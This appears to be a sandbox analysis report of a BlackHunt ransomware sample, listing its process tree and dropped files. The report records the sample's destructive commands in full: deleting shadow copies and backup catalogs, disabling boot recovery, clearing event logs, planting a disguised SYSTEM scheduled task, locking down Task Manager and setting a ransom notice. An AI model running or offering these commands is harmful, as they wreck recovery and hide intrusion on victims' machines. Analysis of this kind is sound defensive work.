                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:2916
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                            3⤵
                                                              PID:1740
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:2480
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                3⤵
                                                                  PID:1232
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                2⤵
                                                                  PID:1776
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                    3⤵
                                                                      PID:572
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:1780
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                        3⤵
                                                                          PID:780
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:1888
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:2276
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:1828
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                3⤵
                                                                                  PID:1716
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:2128
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                    3⤵
                                                                                      PID:2572
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                    2⤵
                                                                                      PID:2136
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                        3⤵
                                                                                          PID:332
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                        2⤵
                                                                                          PID:2008
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                              PID:2104
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                            2⤵
                                                                                              PID:3068
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                  PID:800
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                2⤵
                                                                                                  PID:1372
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                    3⤵
                                                                                                      PID:1420
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                    2⤵
                                                                                                      PID:1272
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                        3⤵
                                                                                                          PID:1200
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F
                                                                                                        2⤵
                                                                                                          PID:880
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F
                                                                                                            3⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:2396
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                          2⤵
                                                                                                            PID:2020
                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                              vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                              3⤵
                                                                                                              • Enumerates connected drives
                                                                                                              • Interacts with shadow copies
                                                                                                              PID:816
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                            2⤵
                                                                                                              PID:480
                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                3⤵
                                                                                                                • Enumerates connected drives
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:1588
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                              2⤵
                                                                                                                PID:528
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                  3⤵
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:1436
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                2⤵
                                                                                                                  PID:1080
                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                    3⤵
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:2920
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                  2⤵
                                                                                                                    PID:2980
                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                                                                      3⤵
                                                                                                                      • Interacts with shadow copies
                                                                                                                      PID:2612
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                    2⤵
                                                                                                                      PID:1744
                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                        bcdedit /set {default} recoveryenabled No
                                                                                                                        3⤵
                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                        PID:572
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                      2⤵
                                                                                                                        PID:1316
                                                                                                                        • C:\Windows\system32\bcdedit.exe
                                                                                                                          bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                          3⤵
                                                                                                                          • Modifies boot configuration data using bcdedit
                                                                                                                          PID:280
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                        2⤵
                                                                                                                          PID:2240
                                                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                                                            fsutil.exe usn deletejournal /D C:
                                                                                                                            3⤵
                                                                                                                            • Deletes NTFS Change Journal
                                                                                                                            PID:1692
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                          2⤵
                                                                                                                            PID:448
                                                                                                                            • C:\Windows\system32\wbadmin.exe
                                                                                                                              wbadmin.exe delete catalog -quiet
                                                                                                                              3⤵
                                                                                                                              • Deletes backup catalog
                                                                                                                              PID:2772
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                            2⤵
                                                                                                                              PID:2200
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                3⤵
                                                                                                                                  PID:916
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                                2⤵
                                                                                                                                  PID:3424
                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                    fsutil usn deletejournal /D F:\
                                                                                                                                    3⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    PID:3800
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                                  2⤵
                                                                                                                                    PID:5200
                                                                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                                                                      fsutil usn deletejournal /D C:\
                                                                                                                                      3⤵
                                                                                                                                        PID:3628
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                                                                      2⤵
                                                                                                                                        PID:5896
                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                          fsutil usn deletejournal /D M:\
                                                                                                                                          3⤵
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          PID:3440
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                                        2⤵
                                                                                                                                          PID:3488
                                                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                                                            wevtutil.exe cl Setup
                                                                                                                                            3⤵
                                                                                                                                            • Clears Windows event logs
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2560
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                          2⤵
                                                                                                                                            PID:3540
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                              3⤵
                                                                                                                                                PID:4076
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                              2⤵
                                                                                                                                                PID:1252
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4020
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3596
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3732
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3476
                                                                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                                                                          wbadmin.exe delete catalog -quiet
                                                                                                                                                          3⤵
                                                                                                                                                          • Deletes backup catalog
                                                                                                                                                          PID:3900
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3428
                                                                                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                                                                                            fsutil.exe usn deletejournal /D C:
                                                                                                                                                            3⤵
                                                                                                                                                            • Deletes NTFS Change Journal
                                                                                                                                                            PID:3932
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3848
                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                              bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                              PID:3976
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1720
                                                                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                bcdedit /set {default} recoveryenabled No
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                                                                PID:1728
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3568
                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                  PID:4072
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3576
                                                                                                                                                                  • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                    wevtutil.exe cl Security /e:false
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Clears Windows event logs
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:2016
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3172
                                                                                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                      wevtutil.exe cl Security
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Clears Windows event logs
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:2520
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3884
                                                                                                                                                                      • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                        wevtutil.exe cl Application
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Clears Windows event logs
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:2204
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2664
                                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                          wevtutil.exe cl System
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Clears Windows event logs
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:3768
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2680
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1576
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2916
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:944
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2992
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2608
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3772
                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                        taskkill /IM mshta.exe /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:2120
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3700
                                                                                                                                                                                        • C:\Windows\system32\notepad.exe
                                                                                                                                                                                          notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:780
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3324
                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                              PID:2536
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Deletes itself
                                                                                                                                                                                            PID:1524
                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                              ping 127.0.0.1 -n 5
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:2772
                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "1455865159-1620223068-355507471-20865455924268963611065944535-40507628-358774383"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:2160
                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:2140
                                                                                                                                                                                        • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                          "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:2196
                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k swprv
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2104
                                                                                                                                                                                          • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                            C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2648
                                                                                                                                                                                            • C:\Windows\System32\vds.exe
                                                                                                                                                                                              C:\Windows\System32\vds.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1420
                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:332
                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:880

                                                                                                                                                                                                  Network

                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                  • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    8640a2dcf8d9d0893c91aeca951af454

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    5a0ecf701e23fef82d3ac9cef659877aee78486f

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    c681b71caabdbc60f3bbc315e017e67c14ff891255759e090c6748a898760d08

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5e36ae70f28c08ce82b7f8214f6f194d2ac4074a97419559679d56b714c5501d0a2363e9e007e3321958940753f518b6998174de2033416a1065d0ca5ec7eb14

                                                                                                                                                                                                  • C:\ProgramData\#BlackHunt_ReadMe.hta

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    12KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    30a1b458b0e080c21f9d23bdd00a1e09

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    c9f34bed06133acca2451b35f660a19f069bfbe2

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d122b9627c20300e6325d8bd72e9e1c0ddbda0873bf5ae4a654390f7da34bdd0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    73c385aa6fe8ed36a236588520efa1fd52351cb502e0283858987d30c9097be566283cd60c578014cf957a8038fe8028002986265f22ceb29eccc27125c7a372

                                                                                                                                                                                                  • C:\ProgramData\#BlackHunt_ReadMe.txt

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    684B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    4d303ca2902394c23d247ac68cc6e856

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    3b66066ce8c892f960e9595fcddfdda1a8e5f3f5

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d15dc111d4fcc6f3bb81285609d29bedb921fc1321d6fd4334675e6dc167219c

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    89e658f6e7e18baa45cfb37bc0d9ae056e4c66e6d55c42908d159afcfebafda9944d59ed26efe8f18d6e34d32653dbaa6f1b3ad317426c106616b39126f3717d